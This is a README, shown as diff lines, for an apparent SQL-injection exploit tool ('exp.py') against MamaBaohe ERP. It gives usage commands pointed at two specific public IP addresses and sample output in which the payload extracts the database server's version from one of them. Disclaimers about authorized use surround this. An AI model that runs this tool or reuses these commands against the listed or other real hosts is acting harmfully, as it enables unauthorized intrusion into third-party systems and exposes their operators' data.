jennfong2002-png/MamaBaohe-ERP-SQLi/README.md

 > **Note:** These IP addresses are provided for reference purposes only.
 Do not test without proper authorization.
 Unauthorized access is illegal.

+# With port
+python exp.py -u 47.115.8.206:8081

+# Default port (80)
+python exp.py -u 111.53.134.165

+$ python exp.py -u 47.115.8.206:8081

+[*] Target: 47.115.8.206:8081
+[*] Sending payload...

+[+] MSSQL Version: Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)

+This tool is for authorized security testing and educational purposes only.
+Unauthorized use against systems without explicit permission is illegal.
+The author assumes no responsibility for any misuse or damage caused.